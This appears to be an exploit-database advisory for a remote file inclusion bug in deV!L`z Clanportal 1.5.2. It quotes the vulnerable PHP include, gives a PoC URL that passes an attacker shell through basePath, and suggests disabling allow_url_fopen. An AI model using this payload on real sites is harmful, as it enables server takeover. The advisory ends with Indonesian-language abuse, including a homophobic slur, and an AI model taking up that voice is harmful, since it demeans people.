Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtCr4wl3r1337DAY-ID-11323
HistoryMar 15, 2010 - 12:00 a.m.

deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

2010-03-1500:00:00
cr4wl3r
0day.today
209
JSON

Exploit for unknown platform in category web applications

==========================================================
deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability
==========================================================

[+]  deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: http://www.dzcp.de/downloads/?action=download&id=131
[x] Code in [dzcp1.5.2/inc/config.php]

## REQUIRES ##
require_once($basePath."/inc/mysql.php");  <--- RFI

function show($tpl, $array)
{
  global $tmpdir;
    $template = "../inc/_templates_/".$tmpdir."/".$tpl;
  
    if($fp = @fopen($template.".".html, "r"))
      $tpl = @fread($fp, filesize($template.".".html));
    
    $array['dir'] = '../inc/_templates_/'.$tmpdir;
    foreach($array as $value => $code)
    {
      $tpl = str_replace('['.$value.']', $code, $tpl);
    }
  return $tpl;
}

[+] PoC: [path]/inc/config.php?basePath=[Shell]

[+] Solution: Change php.ini and set allow_url_fopen to Off

[+] Fuck To: Buat loe yang hanya bisa main loncat-loncat indah, mau ngaku hacker loe anjing. bisanya hanya jumping server.
             dasar dodol loe anjing gay. ngaku hacker bisanya hanya loncat indah. mau jadi penari loncat indah loe anjing??? wkwkwkwkwkwk
             Gw atau loe yang merasa tersindir anjing??? Ngentot aja loe. Main balon sana dodol.

[+] Note: Kalau gw diajak gabung ama FO nya inj3ct0r, loe bisanya apa anjing. Tunjukin kalau loe juga bisa anjing.
          sayang loe engga dihadapan gw. gw lebih seneng berantem secara langsung. ingat gw baik-baik



#  0day.today [2017-12-31]  #
JSON